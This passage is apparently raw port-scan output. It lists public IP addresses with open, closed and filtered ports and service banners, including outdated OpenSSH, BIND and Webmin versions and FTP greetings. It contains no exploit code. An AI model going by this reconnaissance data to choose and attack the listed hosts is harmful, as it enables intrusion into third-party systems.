639845.60.47.218 8020 tcp http open Incapsula CDN httpd
639945.60.47.218 8023 tcp http open Incapsula CDN httpd
640045.60.47.218 8028 tcp http open Incapsula CDN httpd
640145.60.47.218 8030 tcp http open Incapsula CDN httpd
640245.60.47.218 8050 tcp http open Incapsula CDN httpd
640345.60.47.218 8051 tcp http open Incapsula CDN httpd
640445.60.47.218 8080 tcp http open Incapsula CDN httpd
640545.60.47.218 8081 tcp http open Incapsula CDN httpd
640645.60.47.218 8082 tcp http open Incapsula CDN httpd
640745.60.47.218 8085 tcp http open Incapsula CDN httpd
640845.60.47.218 8086 tcp http open Incapsula CDN httpd
640945.60.47.218 8087 tcp http open Incapsula CDN httpd
641045.60.47.218 8088 tcp http open Incapsula CDN httpd
641145.60.47.218 8090 tcp http open Incapsula CDN httpd
641245.60.47.218 8091 tcp http open Incapsula CDN httpd
641345.60.47.218 8095 tcp http open Incapsula CDN httpd
641445.60.47.218 8101 tcp http open Incapsula CDN httpd
641545.60.47.218 8161 tcp http open Incapsula CDN httpd
641645.60.47.218 8180 tcp http open Incapsula CDN httpd
641745.60.47.218 8222 tcp http open Incapsula CDN httpd
641845.60.47.218 8333 tcp http open Incapsula CDN httpd
641945.60.47.218 8443 tcp ssl/http open Incapsula CDN httpd
642045.60.47.218 8444 tcp http open Incapsula CDN httpd
642145.60.47.218 8445 tcp http open Incapsula CDN httpd
642245.60.47.218 8503 tcp ssl/http open Incapsula CDN httpd
642345.60.47.218 8686 tcp http open Incapsula CDN httpd
642445.60.47.218 8701 tcp ssl/http open Incapsula CDN httpd
642545.60.47.218 8787 tcp http open Incapsula CDN httpd
642645.60.47.218 8800 tcp http open Incapsula CDN httpd
642745.60.47.218 8812 tcp http open Incapsula CDN httpd
642845.60.47.218 8834 tcp http open Incapsula CDN httpd
642945.60.47.218 8880 tcp http open Incapsula CDN httpd
643045.60.47.218 8888 tcp http open Incapsula CDN httpd
643145.60.47.218 8889 tcp http open Incapsula CDN httpd
643245.60.47.218 8890 tcp http open Incapsula CDN httpd
643345.60.47.218 8899 tcp http open Incapsula CDN httpd
643445.60.47.218 8901 tcp http open Incapsula CDN httpd
643545.60.47.218 8902 tcp http open Incapsula CDN httpd
643645.60.47.218 8999 tcp http open Incapsula CDN httpd
643745.60.47.218 9000 tcp http open Incapsula CDN httpd
643845.60.47.218 9001 tcp http open Incapsula CDN httpd
643945.60.47.218 9002 tcp http open Incapsula CDN httpd
644045.60.47.218 9003 tcp http open Incapsula CDN httpd
644145.60.47.218 9004 tcp http open Incapsula CDN httpd
644245.60.47.218 9005 tcp http open Incapsula CDN httpd
644345.60.47.218 9010 tcp http open Incapsula CDN httpd
644445.60.47.218 9050 tcp http open Incapsula CDN httpd
644545.60.47.218 9080 tcp http open Incapsula CDN httpd
644645.60.47.218 9081 tcp ssl/http open Incapsula CDN httpd
644745.60.47.218 9084 tcp http open Incapsula CDN httpd
644845.60.47.218 9090 tcp http open Incapsula CDN httpd
644945.60.47.218 9099 tcp http open Incapsula CDN httpd
645045.60.47.218 9100 tcp jetdirect open
645145.60.47.218 9111 tcp http open Incapsula CDN httpd
645245.60.47.218 9200 tcp http open Incapsula CDN httpd
645345.60.47.218 9300 tcp http open Incapsula CDN httpd
645445.60.47.218 9500 tcp http open Incapsula CDN httpd
645545.60.47.218 9711 tcp ssl/http open Incapsula CDN httpd
645645.60.47.218 9991 tcp http open Incapsula CDN httpd
645745.60.47.218 9999 tcp http open Incapsula CDN httpd
645845.60.47.218 10000 tcp http open Incapsula CDN httpd
645945.60.47.218 10001 tcp http open Incapsula CDN httpd
646045.60.47.218 10008 tcp http open Incapsula CDN httpd
646145.60.47.218 10443 tcp ssl/http open Incapsula CDN httpd
646245.60.47.218 11001 tcp ssl/http open Incapsula CDN httpd
646345.60.47.218 12174 tcp http open Incapsula CDN httpd
646445.60.47.218 12203 tcp http open Incapsula CDN httpd
646545.60.47.218 12221 tcp http open Incapsula CDN httpd
646645.60.47.218 12345 tcp http open Incapsula CDN httpd
646745.60.47.218 12397 tcp http open Incapsula CDN httpd
646845.60.47.218 12401 tcp http open Incapsula CDN httpd
646945.60.47.218 14330 tcp http open Incapsula CDN httpd
647045.60.47.218 16000 tcp http open Incapsula CDN httpd
647145.60.47.218 20000 tcp http open Incapsula CDN httpd
647245.60.47.218 20010 tcp ssl/http open Incapsula CDN httpd
647345.60.47.218 25000 tcp ssl/http open Incapsula CDN httpd
647445.60.47.218 30000 tcp http open Incapsula CDN httpd
647545.60.47.218 44334 tcp ssl/http open Incapsula CDN httpd
647645.60.47.218 50000 tcp http open Incapsula CDN httpd
647745.60.47.218 50001 tcp ssl/http open Incapsula CDN httpd
647845.60.47.218 50050 tcp ssl/http open Incapsula CDN httpd
647945.88.202.111 22 tcp ssh open OpenSSH 7.9p1 Debian 10+deb10u1 protocol 2.0
648045.88.202.111 53 tcp domain open PowerDNS Authoritative Server 4.2.0-rc3
648145.88.202.111 53 udp domain open PowerDNS Authoritative Server 4.2.0-rc3
648245.88.202.111 67 tcp dhcps closed
648345.88.202.111 67 udp dhcps unknown
648445.88.202.111 68 tcp dhcpc closed
648545.88.202.111 68 udp dhcpc unknown
648645.88.202.111 69 tcp tftp closed
648745.88.202.111 69 udp tftp closed
648845.88.202.111 80 tcp http open nginx
648945.88.202.111 88 tcp kerberos-sec closed
649045.88.202.111 88 udp kerberos-sec unknown
649145.88.202.111 123 tcp ntp closed
649245.88.202.111 123 udp ntp closed
649345.88.202.111 137 tcp netbios-ns closed
649445.88.202.111 137 udp netbios-ns filtered
649545.88.202.111 138 tcp netbios-dgm closed
649645.88.202.111 138 udp netbios-dgm filtered
649745.88.202.111 139 tcp netbios-ssn closed
649845.88.202.111 139 udp netbios-ssn closed
649945.88.202.111 161 tcp snmp closed
650045.88.202.111 161 udp snmp closed
650145.88.202.111 162 tcp snmptrap closed
650245.88.202.111 162 udp snmptrap closed
650345.88.202.111 179 tcp bgp filtered
650445.88.202.111 389 tcp ldap closed
650545.88.202.111 389 udp ldap unknown
650645.88.202.111 443 tcp ssl/http open nginx
650745.88.202.111 520 tcp efs closed
650845.88.202.111 520 udp route unknown
650945.88.202.111 2049 tcp nfs closed
651045.88.202.111 2049 udp nfs closed
651145.88.202.111 10050 tcp tcpwrapped open
651245.239.108.252 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
651345.239.108.252 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
651445.239.108.252 67 tcp dhcps filtered
651545.239.108.252 67 udp dhcps unknown
651645.239.108.252 68 tcp dhcpc filtered
651745.239.108.252 68 udp dhcpc unknown
651845.239.108.252 69 tcp tftp filtered
651945.239.108.252 69 udp tftp unknown
652045.239.108.252 88 tcp kerberos-sec filtered
652145.239.108.252 88 udp kerberos-sec unknown
652245.239.108.252 123 tcp ntp filtered
652345.239.108.252 123 udp ntp unknown
652445.239.108.252 137 tcp netbios-ns filtered
652545.239.108.252 137 udp netbios-ns unknown
652645.239.108.252 138 tcp netbios-dgm filtered
652745.239.108.252 138 udp netbios-dgm unknown
652845.239.108.252 139 tcp netbios-ssn filtered
652945.239.108.252 139 udp netbios-ssn unknown
653045.239.108.252 161 tcp snmp filtered
653145.239.108.252 161 udp snmp unknown
653245.239.108.252 162 tcp snmptrap filtered
653345.239.108.252 162 udp snmptrap unknown
653445.239.108.252 389 tcp ldap filtered
653545.239.108.252 389 udp ldap unknown
653645.239.108.252 520 tcp efs filtered
653745.239.108.252 520 udp route unknown
653845.239.108.252 2049 tcp nfs filtered
653945.239.108.252 2049 udp nfs unknown
654052.1.2.24 53 tcp domain filtered
654152.1.2.24 53 udp domain unknown
654252.1.2.24 67 tcp dhcps filtered
654352.1.2.24 67 udp dhcps unknown
654452.1.2.24 68 tcp dhcpc filtered
654552.1.2.24 68 udp dhcpc unknown
654652.1.2.24 69 tcp tftp filtered
654752.1.2.24 69 udp tftp unknown
654852.1.2.24 80 tcp http open Apache httpd 2.4.29 (Ubuntu)
654952.1.2.24 88 tcp kerberos-sec filtered
655052.1.2.24 88 udp kerberos-sec unknown
655152.1.2.24 123 tcp ntp filtered
655252.1.2.24 123 udp ntp unknown
655352.1.2.24 137 tcp netbios-ns filtered
655452.1.2.24 137 udp netbios-ns unknown
655552.1.2.24 138 tcp netbios-dgm filtered
655652.1.2.24 138 udp netbios-dgm unknown
655752.1.2.24 139 tcp netbios-ssn filtered
655852.1.2.24 139 udp netbios-ssn unknown
655952.1.2.24 161 tcp snmp filtered
656052.1.2.24 161 udp snmp unknown
656152.1.2.24 162 tcp snmptrap filtered
656252.1.2.24 162 udp snmptrap unknown
656352.1.2.24 389 tcp ldap filtered
656452.1.2.24 389 udp ldap unknown
656552.1.2.24 443 tcp ssl/http open Apache httpd 2.4.29 (Ubuntu)
656652.1.2.24 520 tcp efs filtered
656752.1.2.24 520 udp route unknown
656852.1.2.24 2049 tcp nfs filtered
656952.1.2.24 2049 udp nfs unknown
657052.1.174.10 53 tcp domain filtered
657152.1.174.10 53 udp domain unknown
657252.1.174.10 67 tcp dhcps filtered
657352.1.174.10 67 udp dhcps unknown
657452.1.174.10 68 tcp dhcpc filtered
657552.1.174.10 68 udp dhcpc unknown
657652.1.174.10 69 tcp tftp filtered
657752.1.174.10 69 udp tftp unknown
657852.1.174.10 80 tcp http open nginx
657952.1.174.10 88 tcp kerberos-sec filtered
658052.1.174.10 88 udp kerberos-sec unknown
658152.1.174.10 123 tcp ntp filtered
658252.1.174.10 123 udp ntp unknown
658352.1.174.10 137 tcp netbios-ns filtered
658452.1.174.10 137 udp netbios-ns unknown
658552.1.174.10 138 tcp netbios-dgm filtered
658652.1.174.10 138 udp netbios-dgm unknown
658752.1.174.10 139 tcp netbios-ssn filtered
658852.1.174.10 139 udp netbios-ssn unknown
658952.1.174.10 161 tcp snmp filtered
659052.1.174.10 161 udp snmp unknown
659152.1.174.10 162 tcp snmptrap filtered
659252.1.174.10 162 udp snmptrap unknown
659352.1.174.10 389 tcp ldap filtered
659452.1.174.10 389 udp ldap unknown
659552.1.174.10 443 tcp ssl/http open nginx
659652.1.174.10 520 tcp efs filtered
659752.1.174.10 520 udp route unknown
659852.1.174.10 2049 tcp nfs filtered
659952.1.174.10 2049 udp nfs unknown
660052.52.234.222 53 tcp domain filtered
660152.52.234.222 53 udp domain unknown
660252.52.234.222 67 tcp dhcps filtered
660352.52.234.222 67 udp dhcps unknown
660452.52.234.222 68 tcp dhcpc filtered
660552.52.234.222 68 udp dhcpc unknown
660652.52.234.222 69 tcp tftp filtered
660752.52.234.222 69 udp tftp unknown
660852.52.234.222 88 tcp kerberos-sec filtered
660952.52.234.222 88 udp kerberos-sec unknown
661052.52.234.222 123 tcp ntp filtered
661152.52.234.222 123 udp ntp unknown
661252.52.234.222 137 tcp netbios-ns filtered
661352.52.234.222 137 udp netbios-ns unknown
661452.52.234.222 138 tcp netbios-dgm filtered
661552.52.234.222 138 udp netbios-dgm unknown
661652.52.234.222 139 tcp netbios-ssn filtered
661752.52.234.222 139 udp netbios-ssn unknown
661852.52.234.222 161 tcp snmp filtered
661952.52.234.222 161 udp snmp unknown
662052.52.234.222 162 tcp snmptrap filtered
662152.52.234.222 162 udp snmptrap unknown
662252.52.234.222 389 tcp ldap filtered
662352.52.234.222 389 udp ldap unknown
662452.52.234.222 520 tcp efs filtered
662552.52.234.222 520 udp route unknown
662652.52.234.222 2049 tcp nfs filtered
662752.52.234.222 2049 udp nfs unknown
662854.85.59.109 53 tcp domain filtered
662954.85.59.109 53 udp domain unknown
663054.85.59.109 67 tcp dhcps filtered
663154.85.59.109 67 udp dhcps unknown
663254.85.59.109 68 tcp dhcpc filtered
663354.85.59.109 68 udp dhcpc unknown
663454.85.59.109 69 tcp tftp filtered
663554.85.59.109 69 udp tftp unknown
663654.85.59.109 80 tcp http open nginx
663754.85.59.109 88 tcp kerberos-sec filtered
663854.85.59.109 88 udp kerberos-sec unknown
663954.85.59.109 123 tcp ntp filtered
664054.85.59.109 123 udp ntp unknown
664154.85.59.109 137 tcp netbios-ns filtered
664254.85.59.109 137 udp netbios-ns unknown
664354.85.59.109 138 tcp netbios-dgm filtered
664454.85.59.109 138 udp netbios-dgm unknown
664554.85.59.109 139 tcp netbios-ssn filtered
664654.85.59.109 139 udp netbios-ssn unknown
664754.85.59.109 161 tcp snmp filtered
664854.85.59.109 161 udp snmp unknown
664954.85.59.109 162 tcp snmptrap filtered
665054.85.59.109 162 udp snmptrap unknown
665154.85.59.109 389 tcp ldap filtered
665254.85.59.109 389 udp ldap unknown
665354.85.59.109 443 tcp ssl/http open nginx
665454.85.59.109 520 tcp efs filtered
665554.85.59.109 520 udp route unknown
665654.85.59.109 2049 tcp nfs filtered
665754.85.59.109 2049 udp nfs unknown
665864.69.94.253 53 tcp domain filtered
665964.69.94.253 53 udp domain unknown
666064.69.94.253 67 tcp dhcps filtered
666164.69.94.253 67 udp dhcps unknown
666264.69.94.253 68 tcp dhcpc filtered
666364.69.94.253 68 udp dhcpc unknown
666464.69.94.253 69 tcp tftp filtered
666564.69.94.253 69 udp tftp unknown
666664.69.94.253 88 tcp kerberos-sec filtered
666764.69.94.253 88 udp kerberos-sec unknown
666864.69.94.253 123 tcp ntp filtered
666964.69.94.253 123 udp ntp unknown
667064.69.94.253 137 tcp netbios-ns filtered
667164.69.94.253 137 udp netbios-ns unknown
667264.69.94.253 138 tcp netbios-dgm filtered
667364.69.94.253 138 udp netbios-dgm unknown
667464.69.94.253 139 tcp netbios-ssn filtered
667564.69.94.253 139 udp netbios-ssn unknown
667664.69.94.253 161 tcp snmp filtered
667764.69.94.253 161 udp snmp unknown
667864.69.94.253 162 tcp snmptrap filtered
667964.69.94.253 162 udp snmptrap unknown
668064.69.94.253 389 tcp ldap filtered
668164.69.94.253 389 udp ldap unknown
668264.69.94.253 520 tcp efs filtered
668364.69.94.253 520 udp route unknown
668464.69.94.253 2049 tcp nfs filtered
668564.69.94.253 2049 udp nfs unknown
668669.163.233.4 21 tcp ftp open 220 DreamHost FTP Server\x0d\x0a
668769.163.233.4 22 tcp ssh open SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.13
668869.163.233.4 25 tcp open
668969.163.233.4 53 tcp domain closed
669069.163.233.4 53 udp domain unknown
669169.163.233.4 67 tcp dhcps closed
669269.163.233.4 67 udp dhcps closed
669369.163.233.4 68 tcp dhcpc closed
669469.163.233.4 68 udp dhcpc unknown
669569.163.233.4 69 tcp tftp closed
669669.163.233.4 69 udp tftp closed
669769.163.233.4 88 tcp kerberos-sec closed
669869.163.233.4 88 udp kerberos-sec unknown
669969.163.233.4 123 tcp ntp closed
670069.163.233.4 123 udp ntp unknown
670169.163.233.4 137 tcp netbios-ns closed
670269.163.233.4 137 udp netbios-ns closed
670369.163.233.4 138 tcp netbios-dgm closed
670469.163.233.4 138 udp netbios-dgm closed
670569.163.233.4 139 tcp netbios-ssn closed
670669.163.233.4 139 udp netbios-ssn unknown
670769.163.233.4 161 tcp snmp closed
670869.163.233.4 161 udp snmp closed
670969.163.233.4 162 tcp snmptrap closed
671069.163.233.4 162 udp snmptrap closed
671169.163.233.4 389 tcp ldap closed
671269.163.233.4 389 udp ldap unknown
671369.163.233.4 520 tcp efs closed
671469.163.233.4 520 udp route closed
671569.163.233.4 2049 tcp nfs closed
671669.163.233.4 2049 udp nfs unknown
671774.117.180.192 21 tcp ftp filtered 220 Hello.\x0d\x0a
671874.117.180.192 22 tcp ssh filtered
671974.117.180.192 25 tcp smtp filtered
672074.117.180.192 53 tcp domain closed
672174.117.180.192 53 udp domain unknown
672274.117.180.192 67 tcp dhcps closed
672374.117.180.192 67 udp dhcps unknown
672474.117.180.192 68 tcp dhcpc closed
672574.117.180.192 68 udp dhcpc closed
672674.117.180.192 69 tcp tftp closed
672774.117.180.192 69 udp tftp closed
672874.117.180.192 80 tcp http filtered
672974.117.180.192 88 tcp kerberos-sec closed
673074.117.180.192 88 udp kerberos-sec closed
673174.117.180.192 110 tcp pop3 filtered
673274.117.180.192 111 tcp rpcbind filtered
673374.117.180.192 123 tcp ntp closed
673474.117.180.192 123 udp ntp unknown
673574.117.180.192 137 tcp netbios-ns closed
673674.117.180.192 137 udp netbios-ns closed
673774.117.180.192 138 tcp netbios-dgm closed
673874.117.180.192 138 udp netbios-dgm unknown
673974.117.180.192 139 tcp netbios-ssn closed
674074.117.180.192 139 udp netbios-ssn unknown
674174.117.180.192 143 tcp imap filtered
674274.117.180.192 161 tcp snmp closed
674374.117.180.192 161 udp snmp closed
674474.117.180.192 162 tcp snmptrap closed
674574.117.180.192 162 udp snmptrap unknown
674674.117.180.192 323 tcp rpki-rtr filtered
674774.117.180.192 389 tcp ldap closed
674874.117.180.192 389 udp ldap closed
674974.117.180.192 443 tcp https filtered
675074.117.180.192 465 tcp ssl/smtp open Exim smtpd 4.92.3
675174.117.180.192 520 tcp efs closed
675274.117.180.192 520 udp route unknown
675374.117.180.192 587 tcp submission filtered
675474.117.180.192 873 tcp rsync filtered
675574.117.180.192 993 tcp imaps filtered
675674.117.180.192 995 tcp pop3s filtered
675774.117.180.192 2049 tcp nfs closed
675874.117.180.192 2049 udp nfs closed
675974.117.180.192 2525 tcp smtp open Exim smtpd
676074.117.180.192 3306 tcp mysql filtered
676174.117.180.192 4949 tcp tcpwrapped open
676274.117.180.192 5666 tcp tcpwrapped open
676374.117.180.192 6380 tcp filtered
676474.117.180.192 9306 tcp sphinx-search open Sphinx Search daemon 2.1.5-id64-release
676574.117.180.192 11211 tcp memcache filtered
676682.94.222.131 53 udp domain unknown
676782.94.222.131 67 udp dhcps unknown
676882.94.222.131 68 udp dhcpc unknown
676982.94.222.131 69 udp tftp unknown
677082.94.222.131 88 udp kerberos-sec unknown
677182.94.222.131 123 udp ntp unknown
677282.94.222.131 137 udp netbios-ns unknown
677382.94.222.131 138 udp netbios-dgm unknown
677482.94.222.131 139 udp netbios-ssn unknown
677582.94.222.131 161 udp snmp unknown
677682.94.222.131 162 udp snmptrap unknown
677782.94.222.131 389 udp ldap unknown
677882.94.222.131 520 udp route unknown
677982.94.222.131 2049 udp nfs unknown
678092.123.250.35 53 tcp domain closed
678192.123.250.35 53 udp domain closed
678292.123.250.35 67 tcp dhcps filtered
678392.123.250.35 67 udp dhcps unknown
678492.123.250.35 68 tcp dhcpc filtered
678592.123.250.35 68 udp dhcpc unknown
678692.123.250.35 69 tcp tftp filtered
678792.123.250.35 69 udp tftp unknown
678892.123.250.35 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
678992.123.250.35 88 tcp kerberos-sec filtered
679092.123.250.35 88 udp kerberos-sec unknown
679192.123.250.35 123 tcp ntp filtered
679292.123.250.35 123 udp ntp unknown
679392.123.250.35 137 tcp netbios-ns filtered
679492.123.250.35 137 udp netbios-ns unknown
679592.123.250.35 138 tcp netbios-dgm filtered
679692.123.250.35 138 udp netbios-dgm unknown
679792.123.250.35 139 tcp netbios-ssn filtered
679892.123.250.35 139 udp netbios-ssn unknown
679992.123.250.35 161 tcp snmp filtered
680092.123.250.35 161 udp snmp unknown
680192.123.250.35 162 tcp snmptrap filtered
680292.123.250.35 162 udp snmptrap unknown
680392.123.250.35 389 tcp ldap filtered
680492.123.250.35 389 udp ldap unknown
680592.123.250.35 443 tcp ssl/https open
680692.123.250.35 520 tcp efs filtered
680792.123.250.35 520 udp route unknown
680892.123.250.35 2049 tcp nfs filtered
680992.123.250.35 2049 udp nfs unknown
681092.123.250.35 8883 tcp secure-mqtt open
681192.123.250.65 53 tcp domain filtered
681292.123.250.65 53 udp domain unknown
681392.123.250.65 67 tcp dhcps filtered
681492.123.250.65 67 udp dhcps unknown
681592.123.250.65 68 tcp dhcpc filtered
681692.123.250.65 68 udp dhcpc unknown
681792.123.250.65 69 tcp tftp filtered
681892.123.250.65 69 udp tftp unknown
681992.123.250.65 80 tcp http open AkamaiGHost Akamai's HTTP Acceleration/Mirror service
682092.123.250.65 88 tcp kerberos-sec filtered
682192.123.250.65 88 udp kerberos-sec unknown
682292.123.250.65 123 tcp ntp filtered
682392.123.250.65 123 udp ntp unknown
682492.123.250.65 137 tcp netbios-ns filtered
682592.123.250.65 137 udp netbios-ns unknown
682692.123.250.65 138 tcp netbios-dgm filtered
682792.123.250.65 138 udp netbios-dgm unknown
682892.123.250.65 139 tcp netbios-ssn filtered
682992.123.250.65 139 udp netbios-ssn unknown
683092.123.250.65 161 tcp snmp filtered
683192.123.250.65 161 udp snmp unknown
683292.123.250.65 162 tcp snmptrap filtered
683392.123.250.65 162 udp snmptrap unknown
683492.123.250.65 389 tcp ldap filtered
683592.123.250.65 389 udp ldap unknown
683692.123.250.65 443 tcp ssl/https open
683792.123.250.65 520 tcp efs filtered
683892.123.250.65 520 udp route unknown
683992.123.250.65 2049 tcp nfs filtered
684092.123.250.65 2049 udp nfs unknown
684192.123.250.65 8883 tcp secure-mqtt open
6842104.244.73.40 53 udp domain unknown
6843104.244.73.40 67 udp dhcps unknown
6844104.244.73.40 68 udp dhcpc unknown
6845104.244.73.40 69 udp tftp unknown
6846104.244.73.40 88 udp kerberos-sec unknown
6847104.244.73.40 123 udp ntp unknown
6848104.244.73.40 137 udp netbios-ns unknown
6849104.244.73.40 138 udp netbios-dgm unknown
6850104.244.73.40 139 udp netbios-ssn unknown
6851104.244.73.40 161 udp snmp unknown
6852104.244.73.40 162 udp snmptrap unknown
6853104.244.73.40 389 udp ldap unknown
6854104.244.73.40 520 udp route unknown
6855104.244.73.40 2049 udp nfs unknown
6856104.244.76.231 53 tcp domain filtered
6857104.244.76.231 53 udp domain unknown
6858104.244.76.231 67 tcp dhcps filtered
6859104.244.76.231 67 udp dhcps unknown
6860104.244.76.231 68 tcp dhcpc filtered
6861104.244.76.231 68 udp dhcpc unknown
6862104.244.76.231 69 tcp tftp filtered
6863104.244.76.231 69 udp tftp unknown
6864104.244.76.231 80 tcp http open nginx
6865104.244.76.231 88 tcp kerberos-sec filtered
6866104.244.76.231 88 udp kerberos-sec unknown
6867104.244.76.231 123 tcp ntp filtered
6868104.244.76.231 123 udp ntp unknown
6869104.244.76.231 137 tcp netbios-ns filtered
6870104.244.76.231 137 udp netbios-ns unknown
6871104.244.76.231 138 tcp netbios-dgm filtered
6872104.244.76.231 138 udp netbios-dgm unknown
6873104.244.76.231 139 tcp netbios-ssn filtered
6874104.244.76.231 139 udp netbios-ssn unknown
6875104.244.76.231 161 tcp snmp filtered
6876104.244.76.231 161 udp snmp unknown
6877104.244.76.231 162 tcp snmptrap filtered
6878104.244.76.231 162 udp snmptrap unknown
6879104.244.76.231 389 tcp ldap filtered
6880104.244.76.231 389 udp ldap unknown
6881104.244.76.231 443 tcp ssl/http open nginx
6882104.244.76.231 520 tcp efs filtered
6883104.244.76.231 520 udp route unknown
6884104.244.76.231 2049 tcp nfs filtered
6885104.244.76.231 2049 udp nfs unknown
6886104.244.76.231 5040 tcp unknown closed
6887104.244.76.231 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
6888104.244.76.231 16221 tcp closed
6889104.244.76.231 23022 tcp closed
6890104.244.76.231 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6891104.244.77.188 53 tcp domain filtered
6892104.244.77.188 53 udp domain unknown
6893104.244.77.188 67 tcp dhcps filtered
6894104.244.77.188 67 udp dhcps unknown
6895104.244.77.188 68 tcp dhcpc filtered
6896104.244.77.188 68 udp dhcpc unknown
6897104.244.77.188 69 tcp tftp filtered
6898104.244.77.188 69 udp tftp unknown
6899104.244.77.188 80 tcp http open nginx
6900104.244.77.188 88 tcp kerberos-sec filtered
6901104.244.77.188 88 udp kerberos-sec unknown
6902104.244.77.188 123 tcp ntp filtered
6903104.244.77.188 123 udp ntp unknown
6904104.244.77.188 137 tcp netbios-ns filtered
6905104.244.77.188 137 udp netbios-ns unknown
6906104.244.77.188 138 tcp netbios-dgm filtered
6907104.244.77.188 138 udp netbios-dgm unknown
6908104.244.77.188 139 tcp netbios-ssn filtered
6909104.244.77.188 139 udp netbios-ssn unknown
6910104.244.77.188 161 tcp snmp filtered
6911104.244.77.188 161 udp snmp unknown
6912104.244.77.188 162 tcp snmptrap filtered
6913104.244.77.188 162 udp snmptrap unknown
6914104.244.77.188 389 tcp ldap filtered
6915104.244.77.188 389 udp ldap unknown
6916104.244.77.188 443 tcp ssl/http open nginx
6917104.244.77.188 520 tcp efs filtered
6918104.244.77.188 520 udp route unknown
6919104.244.77.188 2049 tcp nfs filtered
6920104.244.77.188 2049 udp nfs unknown
6921104.244.77.188 5040 tcp unknown closed
6922104.244.77.188 16001 tcp ssl/http open MiniServ 1.910 Webmin httpd
6923104.244.77.188 16221 tcp closed
6924104.244.77.188 23022 tcp closed
6925104.244.77.188 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6926104.244.79.89 53 tcp domain filtered
6927104.244.79.89 53 udp domain unknown
6928104.244.79.89 67 tcp dhcps filtered
6929104.244.79.89 67 udp dhcps unknown
6930104.244.79.89 68 tcp dhcpc filtered
6931104.244.79.89 68 udp dhcpc unknown
6932104.244.79.89 69 tcp tftp filtered
6933104.244.79.89 69 udp tftp unknown
6934104.244.79.89 80 tcp http open nginx
6935104.244.79.89 88 tcp kerberos-sec filtered
6936104.244.79.89 88 udp kerberos-sec unknown
6937104.244.79.89 123 tcp ntp filtered
6938104.244.79.89 123 udp ntp unknown
6939104.244.79.89 137 tcp netbios-ns filtered
6940104.244.79.89 137 udp netbios-ns unknown
6941104.244.79.89 138 tcp netbios-dgm filtered
6942104.244.79.89 138 udp netbios-dgm unknown
6943104.244.79.89 139 tcp netbios-ssn filtered
6944104.244.79.89 139 udp netbios-ssn unknown
6945104.244.79.89 161 tcp snmp filtered
6946104.244.79.89 161 udp snmp unknown
6947104.244.79.89 162 tcp snmptrap filtered
6948104.244.79.89 162 udp snmptrap unknown
6949104.244.79.89 389 tcp ldap filtered
6950104.244.79.89 389 udp ldap unknown
6951104.244.79.89 443 tcp ssl/http open nginx
6952104.244.79.89 520 tcp efs filtered
6953104.244.79.89 520 udp route unknown
6954104.244.79.89 2049 tcp nfs filtered
6955104.244.79.89 2049 udp nfs unknown
6956104.244.79.89 7910 tcp ssl/http open nginx
6957104.244.79.89 7920 tcp unknown closed
6958104.244.79.89 7930 tcp closed
6959104.244.79.89 16001 tcp http open MiniServ 1.930 Webmin httpd
6960104.244.79.89 16010 tcp ssl/http open nginx
6961104.244.79.89 16221 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6962104.244.79.89 32022 tcp ssh open OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 Ubuntu Linux; protocol 2.0
6963107.180.28.114 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 3 of 500 allowed.\x0d\x0a220-Local time is now 05:54. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
6964107.180.28.114 22 tcp ssh open SSH-2.0-OpenSSH_5.3
6965107.180.28.114 53 tcp domain filtered
6966107.180.28.114 53 udp domain unknown
6967107.180.28.114 67 tcp dhcps filtered
6968107.180.28.114 67 udp dhcps unknown
6969107.180.28.114 68 tcp dhcpc filtered
6970107.180.28.114 68 udp dhcpc unknown
6971107.180.28.114 69 tcp tftp filtered
6972107.180.28.114 69 udp tftp unknown
6973107.180.28.114 88 tcp kerberos-sec filtered
6974107.180.28.114 88 udp kerberos-sec unknown
6975107.180.28.114 123 tcp ntp filtered
6976107.180.28.114 123 udp ntp unknown
6977107.180.28.114 137 tcp netbios-ns filtered
6978107.180.28.114 137 udp netbios-ns unknown
6979107.180.28.114 138 tcp netbios-dgm filtered
6980107.180.28.114 138 udp netbios-dgm unknown
6981107.180.28.114 139 tcp netbios-ssn filtered
6982107.180.28.114 139 udp netbios-ssn unknown
6983107.180.28.114 161 tcp snmp filtered
6984107.180.28.114 161 udp snmp unknown
6985107.180.28.114 162 tcp snmptrap filtered
6986107.180.28.114 162 udp snmptrap unknown
6987107.180.28.114 389 tcp ldap filtered
6988107.180.28.114 389 udp ldap unknown
6989107.180.28.114 520 tcp efs filtered
6990107.180.28.114 520 udp route unknown
6991107.180.28.114 2049 tcp nfs filtered
6992107.180.28.114 2049 udp nfs unknown
6993111.90.145.39 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 15:04. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
6994111.90.145.39 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6995111.90.145.39 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
6996111.90.145.39 67 tcp dhcps closed
6997111.90.145.39 67 udp dhcps closed
6998111.90.145.39 68 tcp dhcpc closed
6999111.90.145.39 68 udp dhcpc unknown
7000111.90.145.39 69 tcp tftp closed
7001111.90.145.39 69 udp tftp unknown
7002111.90.145.39 88 tcp kerberos-sec closed
7003111.90.145.39 88 udp kerberos-sec unknown
7004111.90.145.39 123 tcp ntp closed
7005111.90.145.39 123 udp ntp closed
7006111.90.145.39 137 tcp netbios-ns closed
7007111.90.145.39 137 udp netbios-ns unknown
7008111.90.145.39 138 tcp netbios-dgm closed
7009111.90.145.39 138 udp netbios-dgm unknown
7010111.90.145.39 139 tcp netbios-ssn filtered
